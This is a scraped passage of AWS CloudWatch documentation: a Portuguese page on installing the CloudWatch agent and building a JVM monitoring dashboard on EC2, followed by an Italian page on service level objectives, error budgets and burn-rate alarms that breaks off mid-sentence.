AmazonSSMManagedInstanceCore associadas. Após criar o perfil, associe-o às suas instâncias do EC2. Siga as etapas apresentadas em Launch an instance with an IAM role para anexar um perfil durante a inicialização de uma nova instância do EC2. Para anexar um perfil a uma instância do EC2 existente, siga as etapas apresentadas em Attach an IAM role to an instance . Etapa 2: armazenar o arquivo de configuração recomendado do agente do CloudWatch no Systems Manager Parameter Store O Parameter Store simplifica a instalação do agente do CloudWatch em uma instância do EC2 ao armazenar e gerenciar os parâmetros de configuração de forma segura, eliminando a necessidade de valores com codificação rígida. Isso garante um processo de implantação mais seguro e flexível ao possibilitar o gerenciamento centralizado e as atualizações simplificadas para as configurações em diversas instâncias. Use as etapas apresentadas a seguir para armazenar o arquivo de configuração recomendado do agente do CloudWatch como um parâmetro no Parameter Store. Como criar o arquivo de configuração do agente do CloudWatch como um parâmetro Abra o console AWS Systems Manager em https://console.aws.amazon.com/systems-manager/ . No painel de navegação, escolha Gerenciamento de aplicações e, em seguida, Parameter Store . Siga as etapas apresentadas a seguir para criar um novo parâmetro para a configuração. Escolha Criar Parâmetro . Na caixa Nome , insira um nome que será usado para referenciar o arquivo de configuração do agente do CloudWatch nas etapas posteriores. Por exemplo, . AmazonCloudWatch-JVM-Configuration (Opcional) Na caixa Descrição , digite uma descrição para o parâmetro. Em Camadas de parâmetros , escolha Padrão . Para Tipo , escolha String . Em Tipo de dados , selecione texto . Na caixa Valor , cole o bloco em JSON correspondente que foi listado em Configuração do agente para hosts da JVM . Certifique-se de personalizar o valor da dimensão de agrupamento e o número da porta, conforme descrito. Escolha Criar Parâmetro . Etapa 3: instalar o agente do CloudWatch e aplicar a configuração usando um modelo do CloudFormation É possível usar o AWS CloudFormation para instalar o agente e configurá-lo para usar a configuração do agente do CloudWatch criada nas etapas anteriores. Como instalar e configurar o agente do CloudWatch para esta solução Abra o assistente para criar pilha de forma rápida do CloudFormation usando este link: https://console.aws.amazon.com/cloudformation/home?#/stacks/quickcreate?templateURL=https://aws-observability-solutions-prod-us-east-1.s3.us-east-1.amazonaws.com/CloudWatchAgent/CFN/v1.0.0/cw-agent-installation-template-1.0.0.json . Verifique se a região selecionada no console corresponde à região em que a workload da JVM está em execução. Em Nome da pilha , insira um nome para identificar esta pilha, como CWAgentInstallationStack . Na seção Parâmetros , especifique o seguinte: Para CloudWatchAgentConfigSSM , insira o nome do parâmetro do Systems Manager para a configuração do agente que você criou anteriormente, como AmazonCloudWatch-JVM-Configuration . Para selecionar as instâncias de destino, você tem duas opções. Para InstanceIds , especifique uma lista delimitada por vírgulas de IDs de instâncias nas quais você deseja instalar o agente do CloudWatch com esta configuração. É possível listar uma única instância ou várias instâncias. Se você estiver realizando implantações em grande escala, é possível especificar a TagKey e o TagValue correspondente para direcionar todas as instâncias do EC2 associadas a essa etiqueta e a esse valor. Se você especificar uma TagKey , é necessário especificar um TagValue correspondente. (Para um grupo do Auto Scaling, especifique aws:autoscaling:groupName para a TagKey e defina o nome do grupo do Auto Scaling para a TagValue para realizar a implantação em todas as instâncias do grupo do Auto Scaling.) Caso você especifique tanto os parâmetros InstanceIds quanto TagKeys , InstanceIds terá precedência, e as etiquetas serão desconsideradas. Analise as configurações e, em seguida, escolha Criar pilha . Se você desejar editar o arquivo de modelo previamente para personalizá-lo, selecione a opção Fazer upload de um arquivo de modelo no Assistente de criação de pilha para fazer o upload do modelo editado. Para obter mais informações, consulte Criar uma pilha no console do CloudFormation . É possível usar o seguinte link para fazer download do modelo: https://aws-observability-solutions-prod-us-east-1.s3.us-east-1.amazonaws.com/CloudWatchAgent/CFN/v1.0.0/cw-agent-installation-template-1.0.0.json . nota Após a conclusão desta etapa, este parâmetro do Systems Manager será associado aos agentes do CloudWatch em execução nas instâncias de destino. Isto significa que: Se o parâmetro do Systems Manager for excluído, o agente será interrompido. Se o parâmetro do Systems Manager for editado, as alterações de configuração serão aplicadas automaticamente ao agente na frequência programada, que, por padrão, é de 30 dias. Se você desejar aplicar imediatamente as alterações a este parâmetro do Systems Manager, você deverá executar esta etapa novamente. Para obter mais informações sobre as associações, consulte Working with associations in Systems Manager . Etapa 4: verificar se a configuração do agente foi realizada corretamente É possível verificar se o agente do CloudWatch está instalado ao seguir as etapas apresentadas em Verificar se o atendente do CloudWatch está em execução . Se o agente do CloudWatch não estiver instalado e em execução, certifique-se de que todas as configurações foram realizadas corretamente. Certifique-se de ter anexado um perfil com as permissões adequadas para a instância do EC2, conforme descrito na Etapa 1: garantir que as instâncias do EC2 de destino têm as permissões do IAM necessárias . Certifique-se de ter configurado corretamente o JSON para o parâmetro do Systems Manager. Siga as etapas em Solução de problemas de instalação do atendente do CloudWatch com o CloudFormation . Se todas as configurações estiverem corretas, as métricas da JVM serão publicadas no CloudWatch e estarão disponíveis para visualização. É possível verificar no console do CloudWatch para assegurar que as métricas estão sendo publicadas corretamente. Como verificar se as métricas da JVM estão sendo publicadas no CloudWatch Abra o console do CloudWatch, em https://console.aws.amazon.com/cloudwatch/ . Escolha Métricas e, depois, Todas as métricas . Certifique-se de ter selecionado a região na qual a solução foi implantada, escolha Namespaces personalizados e, em seguida, selecione CWAgent . Pesquise pelas métricas mencionadas em Configuração do agente para hosts da JVM , como jvm.memory.heap.used . Caso encontre resultados para essas métricas, isso significa que elas estão sendo publicadas no CloudWatch. Criação de um painel para a solução da JVM O painel fornecido por esta solução apresenta métricas para a Java Virtual Machine (JVM) subjacente para o servidor. O painel fornece uma visão geral da JVM ao agregar e apresentar métricas de todas as instâncias, disponibilizando um resumo de alto nível sobre a integridade geral e o estado operacional. Além disso, o painel mostra um detalhamento dos principais colaboradores (que corresponde aos dez principais por widget de métrica) para cada métrica. Isso ajuda a identificar rapidamente discrepâncias ou instâncias que contribuem significativamente para as métricas observadas. O painel da solução não exibe métricas do EC2. Para visualizar as métricas relacionadas ao EC2, é necessário usar o painel automático do EC2 para acessar as métricas fornecidas diretamente pelo EC2 e usar o painel do console do EC2 para consultar as métricas do EC2 que são coletadas pelo agente do CloudWatch. Para obter mais informações sobre os painéis automáticos para serviços da AWS, consulte Visualização de um painel do CloudWatch para um único serviço da AWS . Para criar o painel, é possível usar as seguintes opções: Usar o console do CloudWatch para criar o painel. Usar o console do AWS CloudFormation para implantar o painel. Fazer o download do código de infraestrutura como código do AWS CloudFormation e integrá-lo como parte da automação de integração contínua (CI). Ao usar o console do CloudWatch para criar um painel, é possível visualizá-lo previamente antes de criá-lo e incorrer em custos. nota O painel criado com o CloudFormation nesta solução exibe métricas da região em que a solução está implantada. Certifique-se de que a pilha do CloudFormation seja criada na mesma região em que as métricas da JVM são publicadas. Se as métricas do agente do CloudWatch estiverem sendo publicadas em um namespace diferente de CWAgent (por exemplo, caso você tenha fornecido um namespace personalizado), será necessário alterar a configuração do CloudFormation para substituir CWAgent pelo namespace personalizado que você está usando. Como criar o painel usando o console do CloudWatch nota Atualmente, os painéis de soluções exibem métricas relacionadas à coleta de resíduos somente para o G1 Garbage Collector, que é o coletor padrão para as versões mais recentes do Java. Caso esteja usando um algoritmo de coleta de resíduos diferente, os widgets relacionados à coleta de resíduos estarão vazios. No entanto, você pode personalizar esses widgets alterando o modelo do painel do CloudFormation e aplicando o tipo de coleta de resíduos apropriado à dimensão do nome das métricas relacionadas à coleta de resíduos. Por exemplo, se você estiver usando a coleta de resíduos paralela, altere name=\"G1 Young Generation\" para name=\"Parallel GC\" da métrica de contagem de coleta de resíduos jvm.gc.collections.count . Abra o console do CloudWatch e acesse Criar painel usando este link: https://console.aws.amazon.com/cloudwatch/home?#dashboards?dashboardTemplate=JvmOnEc2&referrer=os-catalog . Verifique se a região selecionada no console corresponde à região em que a workload da JVM está em execução. Insira o nome do painel e, em seguida, escolha Criar painel . Para diferenciar este painel de painéis semelhantes em outras regiões com facilidade, recomendamos incluir o nome da região no nome do painel, por exemplo, JVMDashboard-us-east-1 . Visualize previamente o painel e escolha Salvar para criá-lo. Como criar o painel usando o CloudFormation Abra o assistente para criar pilha de forma rápida do CloudFormation usando este link: https://console.aws.amazon.com/cloudformation/home?#/stacks/quickcreate?templateURL=https://aws-observability-solutions-prod-us-east-1.s3.us-east-1.amazonaws.com/JVM_EC2/CloudWatch/CFN/v1.0.0/dashboard-template-1.0.0.json . Verifique se a região selecionada no console corresponde à região em que a workload da JVM está em execução. Em Nome da pilha , insira um nome para identificar esta pilha, como JVMDashboardStack . Na seção Parâmetros , especifique o nome do painel no parâmetro DashboardName . Para diferenciar este painel de painéis semelhantes em outras regiões com facilidade, recomendamos incluir o nome da região no nome do painel, por exemplo, JVMDashboard-us-east-1 . Confirme as funcionalidades de acesso relacionadas às transformações na seção Capacidades e transformações . Lembre-se de que o CloudFormation não adiciona recursos do IAM. Analise as configurações e, em seguida, escolha Criar pilha . Quando o status da pilha mostrar CREATE_COMPLETE , selecione a guia Recursos na pilha criada e, em seguida, escolha o link exibido em ID físico para acessar o painel. Como alternativa, é possível acessar o painel diretamente no console do CloudWatch ao selecionar Painéis no painel de navegação do console à esquerda e localizar o nome do painel na seção Painéis personalizados . Se você desejar editar o arquivo de modelo para personalizá-lo para atender a uma necessidade específica, é possível usar a opção Fazer upload de um arquivo de modelo no Assistente de criação de pilha para fazer o upload do modelo editado. Para obter mais informações, consulte Criar uma pilha no console do CloudFormation . É possível usar este link para fazer download do modelo: https://aws-observability-solutions-prod-us-east-1.s3.us-east-1.amazonaws.com/JVM_EC2/CloudWatch/CFN/v1.0.0/dashboard-template-1.0.0.json . nota Atualmente, os painéis de soluções exibem métricas relacionadas à coleta de resíduos somente para o G1 Garbage Collector, que é o coletor padrão para as versões mais recentes do Java. Caso esteja usando um algoritmo de coleta de resíduos diferente, os widgets relacionados à coleta de resíduos estarão vazios. No entanto, você pode personalizar esses widgets alterando o modelo do painel do CloudFormation e aplicando o tipo de coleta de resíduos apropriado à dimensão do nome das métricas relacionadas à coleta de resíduos. Por exemplo, se você estiver usando a coleta de resíduos paralela, altere name=\"G1 Young Generation\" para name=\"Parallel GC\" da métrica de contagem de coleta de resíduos jvm.gc.collections.count . Como começar a usar o painel da JVM A seguir, apresentamos algumas tarefas que você pode realizar para explorar o novo painel da JVM. Essas tarefas permitem a validação do funcionamento correto do painel e fornecem uma experiência prática ao usá-lo para monitorar um grupo de processos da JVM. À medida que realiza as tarefas, você se familiarizará com a navegação no painel e com a interpretação das métricas visualizadas. Seleção de um grupo de processos Use a lista suspensa Nome do grupo de processos da JVM para selecionar o grupo de processos que você deseja monitorar. O painel será atualizado automaticamente para exibir as métricas para o grupo de processos selecionado. Caso você tenha várias aplicações ou ambientes em Java, cada um pode ser representado como um grupo de processos distinto. Selecionar o grupo de processos apropriado garante que você estará visualizando as métricas específicas para a aplicação ou para o ambiente que deseja analisar. Análise do uso de memória Na seção de visão geral do painel, localize os widgets de Porcentagem de uso de memória do heap e de Porcentagem de uso de memória não relacionada ao heap . Os widgets mostram a porcentagem de memória do heap e de memória não relacionada ao heap usadas em todas as JVMs no grupo de processos selecionado. Uma porcentagem elevada pode indicar pressão da memória, o que pode resultar em problemas de performance ou exceções OutOfMemoryError . Além disso, é possível realizar uma busca detalhada do uso de memória do heap por host na seção Uso de memória por host para identificar os hosts com maior utilização. Análise de threads e de classes carregadas Na seção Threads e classes carregadas pelo host , localize os widgets Contagem dos dez principais threads e Dez principais classes carregadas . Procure por JVMs que tenham um número anormalmente elevado de threads ou de classes em comparação com as demais. Um número excessivo de threads pode ser indicativo de vazamentos de threads ou de simultaneidade excessiva, enquanto um grande número de classes carregadas pode indicar possíveis vazamentos no carregador de classes ou problemas com a geração ineficiente de classes dinâmicas. Identificação de problemas de coleta de resíduos Na seção de Coleta de resíduos , localize os widgets Dez principais invocações de coleta de resíduos por minuto e Dez principais duração da coleta de resíduos , separados pelos diferentes tipos de coletor de lixo: Recente , Simultânea e Mista . Procure por JVMs que tenham um número anormalmente elevado de coleções ou de durações longas de coleta em comparação com as demais. Isso pode indicar problemas de configuração ou vazamentos de memória. O Javascript está desativado ou não está disponível no seu navegador. Para usar a documentação da AWS, o Javascript deve estar ativado. Consulte as páginas de Ajuda do navegador para obter instruções. Convenções do documento Soluções de observabilidade do CloudWatch Workload do NGINX no EC2 Essa página foi útil? - Sim Obrigado por nos informar que estamos fazendo um bom trabalho! Se tiver tempo, conte-nos sobre o que você gostou para que possamos melhorar ainda mais. Essa página foi útil? - Não Obrigado por nos informar que precisamos melhorar a página. Lamentamos ter decepcionado você. Se tiver tempo, conte-nos como podemos melhorar a documentação. | 2026-01-13T09:29:26 |
https://docs.aws.amazon.com/it_it/AmazonCloudWatch/latest/monitoring/CloudWatch-ServiceLevelObjectives.html#CloudWatch-ServiceLevelObjectives-concepts | Obiettivi del livello di servizio (SLO) - Amazon CloudWatch Obiettivi del livello di servizio (SLO) - Amazon CloudWatch Documentazione Amazon CloudWatch Guida per l’utente Concetti di SLO Calcolo del budget di errore e del livello di raggiungimento per gli SLO basati su periodi Calcolo del budget di errore e del raggiungimento per gli SLO basati su richieste Calcola l'indice di consumo e, facoltativamente, imposta gli allarmi relativi all'indice di consumo Creazione di uno SLO. Visualizza e valuta lo stato SLO Modifica di uno SLO esistente Eliminazione di uno SLO Le traduzioni sono generate tramite traduzione automatica. In caso di conflitto tra il contenuto di una traduzione e la versione originale in Inglese, quest'ultima prevarrà. Obiettivi del livello di servizio (SLO) È possibile utilizzare Application Signals per creare obiettivi del livello di servizio per i servizi destinati alle operazioni o alle dipendenze aziendali critiche. Creando SLO su questi servizi, avrai la possibilità di tracciarli nel pannello di controllo SLO e di avere una visione d'insieme delle tue operazioni più importanti. Oltre a creare una panoramica che gli operatori possono utilizzare per visualizzare lo stato attuale delle operazioni critiche, puoi utilizzare gli SLO per monitorare le prestazioni a lungo termine dei tuoi servizi, per assicurarti che soddisfino le tue aspettative. Se hai stipulato contratti sul livello di servizio con i clienti, gli SLO sono un ottimo strumento per accertarti che vengano rispettati. La valutazione dello stato dei servizi con gli SLO inizia con la definizione di obiettivi chiari e misurabili basati su parametri delle prestazioni chiave: gli indicatori del livello di servizio (SLI) . Uno SLO tiene traccia delle prestazioni SLI rispetto alla soglia e all'obiettivo prefissati e riporta in che misura le prestazioni delle applicazioni si avvicinano alla soglia. Application Signals ti aiuta a impostare gli SLO sui parametri delle prestazioni chiave. Application Signals raccoglie automaticamente parametri di Latency e Availability per ogni servizio e operazione che individua e questi parametri sono spesso ideali da utilizzare come SLI. Con la procedura guidata di creazione degli SLO, puoi utilizzare questi parametri per i tuoi SLO. Puoi quindi monitorare lo stato di tutti i tuoi SLO tramite i pannelli di controllo di Application Signals. Puoi impostare gli SLO su operazioni o dipendenze specifiche che il tuo servizio chiama o utilizza. Puoi utilizzare come SLI qualsiasi parametro o espressione di parametro di CloudWatch, oltre ai parametri di Latency e Availability . La creazione di SLO è molto importante per ottenere il massimo vantaggio da CloudWatch Application Signals. Dopo aver creato gli SLO, puoi visualizzarne lo stato nella console Application Signals per vedere rapidamente quali di questi servizi e operazioni critici stanno funzionando bene e quali no. La possibilità di monitorare gli SLO offre i seguenti principali vantaggi: Gli operatori di servizi vedere più facilmente l'integrità operativa attuale dei servizi critici confrontandoli con lo SLI. In questo modo possono controllare e identificare rapidamente servizi e operazioni non funzionanti. È possibile monitorare le prestazioni dei servizi rispetto a obiettivi aziendali misurabili per periodi di tempo più lunghi. Scegliendo su cosa impostare gli SLO, dai la priorità a ciò che è importante per te. I pannelli di controllo di Application Signals mostrano automaticamente informazioni su ciò a cui hai dato priorità. Quando crei uno SLO, puoi anche scegliere di creare contemporaneamente allarmi CloudWatch per monitorarlo. Puoi impostare allarmi per monitorare le violazioni della soglia e anche i livelli di avviso. Questi allarmi possono avvisarti automaticamente se i parametri SLO superano la soglia che hai impostato o se si avvicinano a una soglia di avviso. Ad esempio, uno SLO che si avvicina alla soglia di avviso può avvisarti che il tuo team dovrebbe rallentare la frequenza di abbandono dell'applicazione per assicurarsi che gli obiettivi di prestazione a lungo termine vengano raggiunti. Argomenti Concetti di SLO Calcolo del budget di errore e del livello di raggiungimento per gli SLO basati su periodi Calcolo del budget di errore e del raggiungimento per gli SLO basati su richieste Calcola l'indice di consumo e, facoltativamente, imposta gli allarmi relativi all'indice di consumo Creazione di uno SLO. Visualizza e valuta lo stato SLO Modifica di uno SLO esistente Eliminazione di uno SLO Concetti di SLO Uno SLO include i componenti seguenti: Un indicatore del livello di servizio (SLI) , che è un parametro chiave delle prestazioni specificato dall'utente. Rappresenta il livello di prestazione desiderato per l'applicazione. Application Signals raccoglie automaticamente parametri chiave di Latency e Availability per i servizi e le operazioni che individua e questi parametri sono spesso ideali da utilizzare come SLI. Sei tu a scegliere la soglia da utilizzare per il tuo SLI. Ad esempio, 200 ms per la latenza. Un obiettivo o un obiettivo di raggiungimento , ossia la percentuale di tempo o richieste in cui si prevede che lo SLI raggiunga la soglia in ogni intervallo di tempo. Gli intervalli di tempo possono essere brevi, come ore, o lunghi, come un anno. Gli intervalli possono essere intervalli di calendario o intervalli ricorrenti. Gli intervalli di calendario sono allineati al calendario, ad esempio uno SLO registrato mensilmente. CloudWatch regola automaticamente i dati di integrità, budget e raggiungimento in base al numero di giorni in un mese. Gli intervalli di calendario sono più adatti agli obiettivi aziendali che sono misurati in base al calendario. Gli intervalli ricorrenti sono calcolati su base sequenziale. Gli intervalli ricorrenti sono più adatti per monitorare l'esperienza utente recente della tua applicazione. Il periodo è un periodo di tempo più breve e più periodi costituiscono un intervallo. Le prestazioni dell'applicazione vengono confrontate allo SLI durante ogni periodo compreso nell'intervallo. Per ogni periodo, si stabilisce che l'applicazione ha raggiunto o non ha raggiunto le prestazioni previste. Ad esempio, un obiettivo del 99% con un intervallo di calendario di un giorno e un periodo di 1 minuto significa che l'applicazione deve soddisfare o raggiungere la soglia di successo nel 99% dei periodi di 1 minuto durante il giorno. In caso affermativo, lo SLO è stato raggiunto per quel giorno. Il giorno successivo è previsto un nuovo intervallo di valutazione e l'applicazione deve soddisfare o raggiungere la soglia di successo nel 99% dei periodi di 1 minuto durante il secondo giorno per soddisfare lo SLO per il secondo giorno. Uno SLI può essere basato su uno dei nuovi parametri dell'applicazione standard raccolte da Application Signals. In alternativa, può essere qualsiasi parametro o espressione di parametro di CloudWatch. I parametri dell'applicazione standard che è possibile utilizzare per una SLI sono Latency e Availability . Availability rappresenta le risposte andate a buon fine divise per il totale delle richieste. Viene calcolata come (1 - frequenza di errore)*100 , dove le risposte di errore sono 5xx errori. Le risposte andate a buon fine sono risposte prive di errori 5XX . Le risposte 4XX vengono considerate come andate a buon fine. Calcolo del budget di errore e del livello di raggiungimento per gli SLO basati su periodi Quando si visualizzano le informazioni su uno SLO, vengono visualizzati lo stato di integrità corrente e il relativo budget di errore. Il budget di errore è la quantità di tempo all'interno dell'intervallo che può superare la soglia ma consentire comunque di rispettare lo SLO. Il budget di errore totale è la quantità totale di tempo di superamento della soglia che può essere tollerato durante l'intero intervallo. Il budget di errore residuo è la quantità di tempo residuo di superamento della soglia che può essere tollerato durante l'intervallo corrente. Questo si calcola sottraendo dal budget di errore totale la quantità di tempo in cui la soglia è già stata superata. L'immagine seguente illustra i concetti di budget di raggiungimento e di errore per un obiettivo con un intervallo di 30 giorni, periodi di 1 minuto e un obiettivo di raggiungimento del 99%. 30 giorni contengono 43.200 periodi da 1 minuto. Il 99% di 43.200 è 42.768, quindi per raggiungere lo SLO è necessario che 42.768 raggiungano l'obiettivo. Finora, nell'intervallo attuale, 130 periodi di 1 minuto non hanno raggiunto l'obiettivo. Determinazione del successo in ogni periodo All'interno di ogni periodo, i dati SLI vengono aggregati in un unico punto dati basato sulla statistica utilizzata per lo SLI. Questo punto dati rappresenta l'intera durata del periodo. Quel singolo punto dati viene confrontato con la soglia SLI per determinare se il periodo ha raggiunto l'obiettivo. La visualizzazione nel pannello di controllo dei periodi che non hanno raggiunto l'obiettivo durante l'intervallo di tempo corrente può avvisare gli operatori del servizio che è necessario controllarlo. Se si ritiene che il periodo non abbia raggiunto l'obiettivo, l'intera durata del periodo viene conteggiata come non riuscito ai fini del calcolo del budget di errore. Il monitoraggio del budget di errore consente di sapere se il servizio sta ottenendo le prestazioni desiderate per un periodo di tempo più lungo. Esclusioni delle finestre temporali Le esclusioni delle finestre temporali sono un blocco di tempo con una data di inizio e di fine definita. Questo periodo di tempo è escluso dalle metriche delle prestazioni dello SLO ed è possibile pianificare finestre di esclusione una tantum o ricorrenti. Prendiamo come esempio la manutenzione programmata. Nota Per gli SLO basati su periodi, i dati SLI nella finestra di esclusione sono considerati non in violazione. Per gli SLO basati su richiesta, sono escluse tutte le richieste valide e non valide nella finestra di esclusione. Quando un intervallo per uno SLO basato su richiesta viene completamente escluso, viene pubblicata una metrica predefinita del tasso di raggiungimento pari al 100%. È possibile specificare solo finestre temporali con una data di inizio futura. Calcolo del budget di errore e del raggiungimento per gli SLO basati su richieste Dopo aver creato uno SLO, puoi recuperare i report relativi al budget di errore. Un budget di errore rappresenta quante richieste possono non rispettare l'obiettivo dello SLO senza che l'applicazione smetta di soddisfarlo. Per uno SLO basato su richiesta, il budget di errore residuo è dinamico e può aumentare o diminuire, a seconda del rapporto tra richieste valide e richieste totali La tabella seguente illustra il calcolo per uno SLO basato su richiesta con un intervallo di 5 giorni e un obiettivo di raggiungimento dell'85%. In questo esempio, supponiamo che non ci sia stato traffico prima del Giorno 1. Lo SLO non ha raggiunto l'obiettivo il Giorno 10. Orario Total Requests (Richieste totali) Richieste non valide Totale cumulativo delle richieste totali negli ultimi 5 giorni Totale cumulativo delle richieste valide negli ultimi 5 giorni Raggiungimento basato su richieste Richieste totali del budget Richieste rimanenti del budget Giorno 1 10 1 10 9 9/10 = 90% 1.5 0,5 Giorno 2 5 1 15 13 13/15 = 86% 2.3 0.3 Giorno 3 1 1 16 13 13/16 = 81% 2.4 -0,6 Giorno 4 24 0 40 37 37/40 = 92% 6.0 3.0 Giorno 5 20 5 60 52 52/60 = 87% 9,0 1.0 Giorno 6 6 2 56 47 47/56 = 84% 8,4 -0,6 Giorno 7 10 3 61 50 50/61 = 82% 9,2 -1,8 Giorno 8 15 6 75 59 59/75 = 79% 11,3 -4,7 Giorno 9 12 1 63 46 46/63 = 73% 9.5 -7,5 Giorno 10 5 57 40 40/57 = 70% 8,5 -8,5 Raggiungimento finale degli ultimi 5 giorni 70% Calcola l'indice di consumo e, facoltativamente, imposta gli allarmi relativi all'indice di consumo È possibile utilizzare Application Signals per calcolare gli indici di consumo per gli obiettivi del livello di servizio. L'indice di consumo è una metrica che indica la velocità con cui il servizio consuma il budget di errore in rapporto all'obiettivo di raggiungimento dello SLO. È espressa come fattore multiplo del tasso di errore di base. L'indice di consumo viene calcolato in base al tasso di errore di base , che dipende dall'obiettivo di raggiungimento. L'obiettivo di raggiungimento consiste nella percentuale di periodi di tempo soddisfacenti o di richieste riuscite che deve essere ottenuta per raggiungere l'obiettivo SLO. Il tasso di errore di base è (100% - percentuale dell'obiettivo di raggiungimento), e questo numero esaurirebbe esattamente il budget di errore completo alla fine dell'intervallo di tempo dello SLO. Quindi uno SLO con un obiettivo di raggiungimento del 99% avrebbe un tasso di errore di base dell'1%. Il monitoraggio dell'indice di consumo illustra quanto siamo lontani dal tasso di errore di base. Ancora una volta, prendendo l'esempio di un obiettivo di raggiungimento del 99%, è vero quanto segue: Indice di consumo = 1 : se l'indice di consumo rimane sempre esattamente pari al tasso di errore di base, raggiungiamo perfettamente l'obiettivo SLO. Indice di consumo < 1 : se l'indice di consumo è inferiore al tasso di errore di base, siamo sulla buona strada per superare l'obiettivo SLO. Indice di consumo > 1 : se l'indice di consumo è superiore al tasso di errore di base, probabilmente non riusciremo a raggiungere l'obiettivo SLO. Quando crei indici di consumo per i tuoi SLO, puoi anche scegliere di creare contemporaneamente degli allarmi CloudWatch per monitorare tali indici. Puoi impostare una soglia per gli indici di consumo e gli allarmi possono avvisarti automaticamente se le metriche relative a tali indici superano la soglia che hai impostato. Ad esempio, un indice di consumo vicino alla soglia può indicare che lo SLO sta consumando il budget di errore più rapidamente di quanto il tuo team possa tollerare e che potrebbe essere necessario rallentare il ritmo dei cambiamenti nell'applicazione per garantire il raggiungimento degli obiettivi prestazionali a lungo termine. La creazione di allarmi comporta addebiti. Per ulteriori informazioni sui prezzi di CloudWatch, consulta Prezzi di Amazon CloudWatch . Calcolo dell'indice di consumo Per calcolare l'indice di consumo è necessario specificare una finestra di visualizzazione retrospettiva . La finestra di visualizzazione retrospettiva è il periodo di tempo durante il quale misurare il tasso di errore. burn rate = error rate over the look-back window / (100% - attainment goal) Nota Se non sono disponibili dati relativi al periodo dell'indice di consumo, Application Signals calcola tale indice in base al raggiungimento. Il tasso di errore viene calcolato come rapporto tra il numero di eventi non validi e il numero totale di eventi durante la finestra dell'indice di consumo: Per gli SLO basati su periodi, il tasso di errore viene calcolato dividendo i periodi negativi per i periodi totali. Il totale dei periodi rappresenta la totalità dei periodi presenti nella finestra di visualizzazione retrospettiva. Per gli SLO basati su richieste, si tratta di una misura delle richieste non valide divisa per le richieste totali. Il numero totale di richieste è il numero di richieste durante la finestra di visualizzazione retrospettiva. La finestra di visualizzazione retrospettiva deve essere un multiplo del periodo SLO e deve essere inferiore all'intervallo SLO. Determina la soglia appropriata per un allarme relativo all'indice di consumo Quando si configura un allarme relativo all'indice di consumo, è necessario scegliere un valore per l'indice di consumo come soglia di allarme. Il valore di questa soglia dipende dalla lunghezza dell'intervallo SLO e dalla finestra di visualizzazione retrospettiva, e dipende dal metodo o dal modello mentale che il team desidera adottare. Sono disponibili due metodi principali per determinare la soglia. Metodo 1: determina la percentuale del budget totale stimato per gli errori che il team è disposto a consumare nella finestra di visualizzazione retrospettiva. Se vuoi ricevere un allarme quando l'X% del budget di errore stimato viene speso nelle ultime ore di visualizzazione retrospettiva dell'indice di consumo, la soglia dell'indice di consumo è la seguente: burn rate threshold = X% * SLO interval length / look-back window size Ad esempio, il 5% di un budget di errore di 30 giorni (720 ore) impiegato per più di un'ora richiede un indice di consumo pari a 5% * 720 / 1 = 36 . Pertanto, se la finestra di visualizzazione retrospettiva sull'indice di consumo è di 1 ora, impostiamo la soglia dell'indice di consumo su 36. Puoi utilizzare la console CloudWatch per creare allarmi sull'indice di consumo utilizzando questo metodo. È possibile specificare il numero X e la soglia viene determinata utilizzando la formula precedente. La lunghezza dell'intervallo SLO viene determinata in base al tipo di intervallo SLO: Per gli SLO con un intervallo basato sulla rotazione, è la durata dell'intervallo in ore. Per gli SLO con un intervallo basato sul calendario: Se l'unità è costituita da giorni o settimane, è la lunghezza dell'intervallo in ore. Se l'unità è un mese, prendiamo 30 giorni come lunghezza stimata e la convertiamo in ore. Metodo 2: determina il tempo che manca all'esaurimento del budget per l'intervallo successivo Per far sì che l'allarme ti avvisi quando il tasso di errore corrente nella finestra di visualizzazione retrospettiva più recente indica che mancano meno di X ore all'esaurimento del budget (supponendo che il budget residuo sia attualmente del 100%), puoi utilizzare la seguente formula per determinare la soglia dell'indice di consumo. burn rate threshold = SLO interval length / X Sottolineiamo che il tempo che manca all'esaurimento del budget (X) nella formula precedente presuppone che il budget totale rimanente sia attualmente del 100% e pertanto non tiene conto dell'importo del budget che è già stato consumato in questo intervallo. Possiamo anche considerarlo come il tempo che manca all'esaurimento del budget per l'intervallo successivo. Procedure dettagliate per gli allarmi relativi all'indice di consumo Ad esempio, prendiamo uno SLO con un intervallo di rotazione di 28 giorni. L'impostazione di un allarme relativo all'indice di consumo per questo SLO prevede due passaggi: Impostazione dell'indice di consumo e della finestra di visualizzazione retrospettiva. Creazione di un allarme CloudWatch che monitora l'indice di consumo. Per iniziare, stabilisci la quota del budget totale per gli errori che il servizio è disposto a consumare entro un periodo di tempo specifico. In altre parole, stabilisci il tuo obiettivo usando questa frase: “Voglio essere avvisato quando l'X% del mio budget totale destinato agli errori viene consumato entro M minuti”. Ad esempio, potresti impostare l'obiettivo in modo da ricevere un avviso quando il 2% del budget totale per gli errori viene consumato entro 60 minuti. Per impostare l'indice di consumo, è necessario innanzitutto definire la finestra di visualizzazione retrospettiva. La finestra di visualizzazione retrospettiva è M, che in questo esempio è di 60 minuti. Successivamente, crea l'allarme CloudWatch. In questa fase, è necessario specificare una soglia per l'indice di consumo. Se l'indice di consumo supera tale soglia, l'allarme genererà un avviso. Per trovare la soglia, usa la formula seguente: burn rate threshold = X% * SLO interval length/ look-back window size In questo esempio, X è 2 perché vogliamo essere avvisati se il 2% del budget di errore viene consumato entro 60 minuti. La durata dell'intervallo è di 40.320 minuti (28 giorni) e 60 minuti è la finestra di visualizzazione retrospettiva, quindi la risposta è: burn rate threshold = 2% * 40,320 / 60 = 13.44. In questo esempio, dovresti impostare 13,44 come soglia di allarme. Allarmi multipli con finestre diverse Impostando gli allarmi su più finestre di visualizzazione retrospettiva, è possibile rilevare rapidamente picchi del tasso di errore con una finestra breve e al contempo rilevare aumenti minori del tasso di errore che, se ignorati, finirebbero col ridurre il budget di errore. Inoltre, è possibile impostare un allarme composito su un indice di consumo con finestra lunga e su un indice di consumo con finestra breve (1/12 della finestra lunga) ed essere informati solo quando entrambi gli indici di consumo superano una soglia. In questo modo, è possibile ricevere un avviso solo per le situazioni ancora in corso. Per ulteriori informazioni sugli allarmi compositi in CloudWatch, consulta Combinazione di allarmi . Nota Quando crei l'indice di consumo, puoi impostare un allarme di metrica su tale indice. Per impostare un allarme composito su più allarmi di indice di consumo, è necessario utilizzare le istruzioni in Create a composite alarm . Una strategia di allarme composito consigliata nella cartella di lavoro di Google Site Reliability Engineering include tre allarmi compositi: Un allarme composito che rileva un paio di allarmi, uno con una finestra di un'ora e uno con una finestra di cinque minuti. Un secondo allarme composito che rileva un paio di allarmi, uno con una finestra di sei ore e uno con una finestra di 30 minuti. Un terzo allarme composito che rileva un 